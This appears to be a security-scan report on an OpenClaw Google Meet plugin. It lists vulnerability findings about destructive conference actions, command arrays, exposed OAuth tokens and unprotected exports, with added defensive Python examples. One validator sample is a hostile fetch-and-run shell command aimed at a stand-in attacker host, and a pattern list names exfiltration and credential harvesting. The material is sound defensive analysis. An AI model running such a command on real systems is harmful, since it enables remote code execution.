Google Meet

Security checks across malware telemetry and agentic risk

Overview

This official OpenClaw Google Meet plugin carries sensitive meeting and OAuth capabilities, but they are consistent with its stated purpose of joining and managing Meet calls; nothing in it amounts to hidden exfiltration or destructive malware.

Install only if you want OpenClaw to join and manage Google Meet calls. Handle OAuth tokens carefully, keep token output out of logs and screen shares, write transcript/attendance exports only to protected locations, and restrict who can invoke the create/end-conference actions or owner-level realtime tool policies.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (9)

Context-Inappropriate Capability

Severity: Medium
Confidence: 93%
Finding
The skill can create new Google Meet spaces and end active conferences using OAuth-backed write actions, but this file shows no local authorization check, confirmation step, or intent validation before executing destructive behavior. If exposed through a broader agent workflow, a prompt injection, misrouted tool call, or unauthorized invocation could abruptly terminate live meetings or create meetings without user approval.

Context-Inappropriate Capability

Severity: Medium
Confidence: 88%
Finding
The configuration permits user-supplied command arrays for audioInputCommand, audioOutputCommand, bargeInInputCommand, audioBridgeCommand, and related health commands. If any downstream component executes these arrays as subprocesses, an attacker who can influence configuration can achieve arbitrary local command execution, which is especially dangerous in an agent/plugin environment that may run with user or service privileges.
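The defensive check this finding implies, as an added example in Python (it is not the plugin's code, whatever language the plugin itself is written in): a configured command array is validated against an operator-pinned allowlist of absolute binaries and rejected if any argument carries shell metacharacters, and it is only ever executed in argv form with no shell. The config key names (audioInputCommand and friends) come from the finding; the allowlist contents and the sample configs are constructed for illustration.

```python
# Added example (not the plugin's code): validate a user-supplied command
# array before it ever reaches a subprocess. The config key names
# (audioInputCommand etc.) come from the finding; the allowlist is assumed.
import os
import subprocess
from typing import Sequence

# Assumption: the operator pins the exact binaries the plugin may launch.
ALLOWED_BINARIES = {"/usr/bin/ffmpeg", "/usr/bin/arecord", "/usr/bin/aplay"}
# Characters that only matter if some component wraps the array in `sh -c`;
# rejecting them closes that door even if a downstream caller is careless.
SHELL_METACHARACTERS = set(";|&$`<>(){}\n")


class UnsafeCommand(ValueError):
    """Raised when a configured command array fails validation."""


def validate_command(argv: Sequence[str]) -> list[str]:
    """Return a copy of argv if it is safe to execute, else raise UnsafeCommand."""
    if not argv or not all(isinstance(a, str) for a in argv):
        raise UnsafeCommand("command must be a non-empty array of strings")
    binary = argv[0]
    if not os.path.isabs(binary):
        # Relative names resolve through PATH, which an attacker may control.
        raise UnsafeCommand(f"binary must be an absolute path: {binary!r}")
    if os.path.normpath(binary) not in ALLOWED_BINARIES:
        raise UnsafeCommand(f"binary not in allowlist: {binary!r}")
    for arg in argv[1:]:
        if SHELL_METACHARACTERS & set(arg):
            raise UnsafeCommand(f"shell metacharacter in argument: {arg!r}")
    return list(argv)


def is_safe_command(argv: Sequence[str]) -> bool:
    """Boolean form of validate_command, convenient for linting a whole config."""
    try:
        validate_command(argv)
        return True
    except UnsafeCommand:
        return False


def run_audio_command(argv: Sequence[str], timeout: float = 30.0) -> subprocess.CompletedProcess:
    """Execute a validated array directly: argv form, shell=False, bounded runtime."""
    safe_argv = validate_command(argv)
    # With shell=False (the default) the list goes straight to execve and nothing
    # in it is re-parsed by /bin/sh; the timeout keeps a hung recorder from
    # wedging the agent.
    return subprocess.run(safe_argv, capture_output=True, timeout=timeout, check=False)


if __name__ == "__main__":
    # Constructed sample configs, not taken from the plugin.
    good = ["/usr/bin/arecord", "-f", "S16_LE", "-r", "16000", "-"]
    bad = ["bash", "-c", "curl http://attacker.invalid/x | sh"]
    print(validate_command(good))
    print("rejected bad config:", not is_safe_command(bad))
```

Run the validation at config-load time, not only at spawn time, so a poisoned configuration is reported before the agent is live in a meeting.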

Description-Behavior Mismatch

Severity: Medium
Confidence: 93%
Finding
The plugin advertises itself as only joining Google Meet calls through Chrome or Twilio, but the implementation also accesses Google Calendar, OAuth tokens, conference artifacts, attendance, transcripts, export bundles, and can end active conferences. This scope understatement can mislead operators and higher-level agents into granting or invoking the tool with broader privileges than intended, increasing the chance of unauthorized data access or destructive actions.

Intent-Code Divergence

Severity: Medium
Confidence: 90%
Finding
The description says realtime tools are 'safe read-only' by default, yet the code can resolve broader consult tools based on policy in bidi mode and the consult pathway may invoke more than narrowly bounded status checks. This creates a trust-boundary mismatch where users or upstream agents may assume harmless read-only behavior and approve actions that can exercise broader tool access.

Missing User Warnings

Severity: High
Confidence: 95%
Finding
The `endGoogleMeetActiveConference` function issues a direct write request to terminate a live conference after resolving the meeting space, with no visible confirmation, dual control, or safety interlock in this file. In an agent setting, destructive real-time actions are especially dangerous because a mistaken or manipulated invocation can immediately disrupt ongoing communications for all participants.
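The interlock that this finding and the earlier Context-Inappropriate Capability finding both ask for, as an added example in Python (not the plugin's code): a policy gate that every destructive Meet action must pass before a write request is issued. An agent principal may only end or create a conference if the policy lists it as an allowed invoker, and even then only with a confirmation from a human owner, so a prompt injection or misrouted tool call cannot self-approve. The action names, the "owner:" / "agent:" principal naming, the policy shape and the meeting codes are assumptions for illustration; the real API call is supplied by the caller as `do_end`.

```python
# Added example (not the plugin's code): a gate that destructive Meet actions
# must pass before any write request is issued. The action names, principal
# naming scheme ("owner:<name>", "agent:<name>") and policy shape are assumptions.
from dataclasses import dataclass, field
from typing import Callable, Optional

DESTRUCTIVE_ACTIONS = {"end_conference", "create_space"}


@dataclass
class ToolPolicy:
    # Principals allowed to invoke each destructive action at all.
    allowed_invokers: dict[str, set[str]]
    # Actions that need a human owner in the loop when an agent proposes them.
    require_confirmation: set[str] = field(default_factory=lambda: set(DESTRUCTIVE_ACTIONS))


@dataclass
class ToolCall:
    action: str
    invoker: str                          # who issued the call, e.g. "owner:alice" or "agent:planner"
    meeting_code: str
    confirmed_by: Optional[str] = None    # human who approved an agent-proposed call, if any


def decide(call: ToolCall, policy: ToolPolicy) -> tuple[bool, str]:
    """Return (allowed, reason). Non-destructive actions pass through untouched."""
    if call.action not in DESTRUCTIVE_ACTIONS:
        return True, "not destructive"
    if call.invoker not in policy.allowed_invokers.get(call.action, set()):
        return False, f"{call.invoker} may not invoke {call.action}"
    human_invoked = call.invoker.startswith("owner:")
    if call.action in policy.require_confirmation and not human_invoked:
        # An agent (or a misrouted tool call, or an injected instruction)
        # cannot self-approve: the confirmation must name a human owner.
        if not (call.confirmed_by or "").startswith("owner:"):
            return False, f"{call.action} on {call.meeting_code} needs owner confirmation"
    return True, "allowed"


def end_conference_guarded(call: ToolCall, policy: ToolPolicy,
                           do_end: Callable[[str], bool]) -> bool:
    """Reach the real write call (do_end, supplied by the caller) only when the gate allows it."""
    allowed, reason = decide(call, policy)
    if not allowed:
        raise PermissionError(reason)
    return do_end(call.meeting_code)


if __name__ == "__main__":
    policy = ToolPolicy(allowed_invokers={
        "end_conference": {"owner:alice", "agent:planner"},
        "create_space": {"owner:alice"},
    })
    # Constructed calls; the meeting code is not a real one.
    print(decide(ToolCall("end_conference", "agent:planner", "abc-defg-hij"), policy))
    print(decide(ToolCall("end_conference", "agent:planner", "abc-defg-hij",
                          confirmed_by="owner:alice"), policy))
    print(decide(ToolCall("create_space", "agent:planner", "-"), policy))
```

The gate deliberately sits in front of the write call rather than in the tool description: a description can be overridden by a prompt injection, a code path cannot.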

Missing User Warnings

Severity: Medium
Confidence: 91%
Finding
The export flow writes transcripts, attendance, raw artifacts, and optionally document bodies to disk and ZIP archives without any explicit sensitivity warning or secure-default storage controls. In this skill context, the data is highly sensitive meeting content and participant metadata, so silent persistence materially increases risk of accidental disclosure through shared disks, backups, or later exfiltration.

Missing User Warnings

Severity: Medium
Confidence: 95%
Finding
The OAuth login command prints configuration JSON containing refreshToken and accessToken directly to stdout, and only labels it as something to paste into config. In terminals with scrollback capture, shell logging, CI logs, screen sharing, or multi-user environments, this can expose long-lived credentials that enable API access beyond the immediate session.
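How a login command can hand tokens to the operator without echoing them, as an added example in Python (not the plugin's code): the credentials go to a file created owner-read/write only and never overwritten, and stdout gets a redacted preview so the operator can confirm the shape of the config without the secrets ever reaching scrollback or CI logs. The refreshToken/accessToken key names follow the finding; the file location and the sample token values are constructed for illustration.

```python
# Added example (not the plugin's code): deliver OAuth tokens from a login
# command without echoing them. Secrets go to a 0600 file; stdout gets a
# redacted preview. Key names follow the finding; the file location is assumed.
import json
import os
import stat
import tempfile

SECRET_KEYS = {"refreshToken", "accessToken", "clientSecret"}


def redact(obj):
    """Recursively replace secret-bearing string values with a placeholder."""
    if isinstance(obj, dict):
        return {k: ("<redacted>" if k in SECRET_KEYS and isinstance(v, str) else redact(v))
                for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return obj


def write_private_json(path: str, data: dict) -> int:
    """Create `path` owner-read/write only, refusing to overwrite; return its mode bits."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as f:
        json.dump(data, f, indent=2)
    os.chmod(path, 0o600)   # the umask can only tighten O_CREAT's mode; make it explicit
    return stat.S_IMODE(os.stat(path).st_mode)


def login_output(config: dict, path: str) -> tuple[str, int]:
    """What the login command should print (a redacted preview) and the file mode it wrote."""
    mode = write_private_json(path, config)
    preview = json.dumps(redact(config), indent=2)
    return f"Wrote credentials to {path} (mode {mode:o}). Preview:\n{preview}", mode


def demo_login() -> tuple[str, int, bool]:
    """Run login_output on constructed tokens in a temp dir; report whether secrets leaked."""
    config = {"clientId": "example-client", "refreshToken": "REFRESH-SECRET-1",
              "accessToken": "ACCESS-SECRET-2", "scopes": ["meetings.space.created"]}
    with tempfile.TemporaryDirectory() as d:
        text, mode = login_output(config, os.path.join(d, "google-meet.json"))
    leaked = "SECRET" in text
    return text, mode, leaked


if __name__ == "__main__":
    text, mode, leaked = demo_login()
    print(text)
    print("secrets leaked to stdout:", leaked)
```

The O_EXCL flag matters as much as the mode: it stops the login command from silently clobbering an existing credential file, or from following a symlink an attacker planted at that path.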

Missing User Warnings

Severity: Medium
Confidence: 89%
Finding
The artifacts and attendance commands allow writing meeting metadata to arbitrary user-supplied paths without warning that the output may contain sensitive participant, attendance, and transcript-derived information. In a meeting-analysis skill, this context makes the issue more serious because operators may unintentionally persist regulated or confidential data to insecure locations.
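The secure-default storage control that this finding and the earlier export-flow finding both lack, as an added example in Python (not the plugin's code): user-supplied output paths for artifacts, attendance and transcripts are resolved against an operator-chosen export root and rejected if they escape it (via an absolute path, `..` segments or a symlink), and the files are created in 0700 directories with 0600, non-clobbering permissions. The export root, function names and the sample payload are assumptions for illustration.

```python
# Added example (not the plugin's code): confine artifact/attendance export paths
# to an operator-chosen root and create the files owner-only. The root, function
# names and payload are assumptions for illustration.
import os
import pathlib
import tempfile


class UnsafeOutputPath(ValueError):
    """Raised when a requested output path would land outside the export root."""


def resolve_export_path(user_path: str, export_root: str) -> pathlib.Path:
    """Map a user-supplied path onto export_root, rejecting anything that escapes it.

    Joining an absolute user_path to root yields user_path itself, and `..`
    segments or symlinks inside the root are collapsed by resolve(); in all
    three cases the relative_to() check below fails closed.
    """
    root = pathlib.Path(export_root).resolve()
    candidate = (root / user_path).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise UnsafeOutputPath(f"{user_path!r} escapes export root {root}") from None
    return candidate


def is_confined(user_path: str, export_root: str) -> bool:
    """Boolean form of resolve_export_path for quick checks."""
    try:
        resolve_export_path(user_path, export_root)
        return True
    except UnsafeOutputPath:
        return False


def write_sensitive_export(user_path: str, export_root: str, payload: bytes) -> pathlib.Path:
    """Write meeting data under export_root with 0700 dirs and a 0600, non-clobbering file."""
    target = resolve_export_path(user_path, export_root)
    target.parent.mkdir(parents=True, exist_ok=True, mode=0o700)
    fd = os.open(target, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as f:
        f.write(payload)
    return target


def demo_export() -> dict:
    """Exercise the confinement on constructed inputs and report what happened."""
    with tempfile.TemporaryDirectory() as root:
        written = write_sensitive_export("2024-06-01/attendance.json", root,
                                         b'{"participants": ["constructed sample"]}')
        return {
            "inside_root": written.is_relative_to(pathlib.Path(root).resolve()),
            "file_mode": written.stat().st_mode & 0o777,
            "traversal_blocked": not is_confined("../../etc/passwd", root),
            "absolute_blocked": not is_confined("/etc/passwd", root),
        }


if __name__ == "__main__":
    print(demo_export())
```

Pair the confinement with a one-line notice at write time naming the kind of data persisted (participants, transcript text) so an operator reviewing the command output sees what just landed on disk.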

Missing User Warnings

Severity: Medium
Confidence: 84%
Finding
The manifest describes joining Google Meet calls and supports realtime transcription, browser automation, and voice participation, but the top-level description does not clearly warn users that the plugin may enter meetings and capture/transcribe live audio. In a communications plugin handling private meetings, missing explicit privacy disclosure can lead to uninformed consent failures and accidental surveillance of sensitive conversations.

VirusTotal

59/59 vendors reported this plugin as clean (no detections).

View on VirusTotal